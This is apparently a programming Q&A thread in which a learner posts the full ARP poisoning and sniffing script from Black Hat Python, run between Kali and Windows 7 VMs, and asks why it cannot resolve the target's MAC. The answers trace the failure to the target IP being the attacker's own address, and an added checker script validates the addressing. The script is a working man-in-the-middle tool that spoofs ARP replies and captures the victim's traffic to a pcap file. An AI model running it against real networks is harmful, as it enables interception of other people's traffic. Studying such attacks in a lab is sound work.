ARP Poisoning with scapy: Failure to get target MAC
In the fourth chapter of Justin Seitz's Black Hat Python book, in the section detailing ARP poisoning using scapy, I'm having issues obtaining the MAC address of the target IP of the target machine. I'm using a Kali VM as the attacking machine and a Win 7 VM as the target machine.
from scapy.all import *
import os
import sys
import threading
import signal
import time

interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    # Broadcast the real IP-to-MAC bindings so both ARP caches are corrected
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    # Signal the main thread to exit
    os.kill(os.getpid(), signal.SIGINT)


def get_mac(ip_address):
    # Broadcast an ARP request and return the MAC of the first reply, if any
    responses, unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
    for s, r in responses:
        return r[Ether].src
    return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"
    while True:
        try:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            print "[*] ARP poison attack finished."
            return


conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)
if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

poison_thread = threading.Thread(target=poison_target, args=(
    gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    # Save the captured packets, then restore the ARP caches
    wrpcap('arper.pcap', packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)

The attacking machine:

root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
        ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
        RX packets 101529 bytes 101906744 (97.1 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 34775 bytes 3530239 (3.3 MiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 218 bytes 13972 (13.6 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 218 bytes 13972 (13.6 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

The output:

root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.

You use the IP of Kali (the attacking machine) as target_ip (10.0.2.15). Win runs on the same computer, however in a virtual machine, and normally a virtual machine has its own IPs (https://www.quora.com/Do-virtual-machines-have-their-own-IP).

It is not even certain that Win on the VM is automatically on the same network. To assign static IPs for the VM and Kali in the same /24 network (i.e. 10.0.2.x/24, replace the x), see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address

coder is right: first check if network connectivity is established by pinging
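
The two conditions the answer points at (the target address must differ from the machine's own, and both hosts must share one /24) can be checked from the interface listing before any ARP request is sent. This is an added example, not part of the original posts: it uses only the Python 3 standard library, the function names `local_interface` and `arp_preflight` are hypothetical, and the address 10.0.2.4 is a constructed sample.

```python
import ipaddress
import re

# eth0 stanza copied from the question's ifconfig listing.
IFCONFIG_SAMPLE = """\
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
        ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
"""

def local_interface(ifconfig_text, name):
    """Return the IPv4 address/netmask of interface `name` from ifconfig text."""
    stanza = re.search(r"^%s: .*?(?=^\S|\Z)" % re.escape(name),
                       ifconfig_text, re.M | re.S)
    if stanza is None:
        raise ValueError("interface %s not found" % name)
    m = re.search(r"inet (\S+)\s+netmask (\S+)", stanza.group(0))
    if m is None:
        raise ValueError("interface %s has no IPv4 address" % name)
    return ipaddress.ip_interface("%s/%s" % m.groups())

def arp_preflight(local, target_ip, gateway_ip):
    """List the configuration problems the answer describes; empty if none."""
    target = ipaddress.ip_address(target_ip)
    gateway = ipaddress.ip_address(gateway_ip)
    problems = []
    if target == local.ip:
        problems.append("target_ip is this host's own address")
    if target == gateway:
        problems.append("target_ip equals gateway_ip")
    for label, addr in (("target_ip", target), ("gateway_ip", gateway)):
        if addr not in local.network:
            problems.append("%s is outside %s" % (label, local.network))
    if target in (local.network.network_address, local.network.broadcast_address):
        problems.append("target_ip is a network or broadcast address")
    return problems

if __name__ == "__main__":
    local = local_interface(IFCONFIG_SAMPLE, "eth0")
    # 10.0.2.15 is the target_ip from the question; 10.0.2.4 is constructed.
    for candidate in ("10.0.2.15", "10.0.2.4"):
        print(candidate, arp_preflight(local, candidate, "10.0.2.2") or "ok")
```

An empty list only means the addressing is consistent; whether the two VMs actually share a network still has to be confirmed with a ping, as the last comment says.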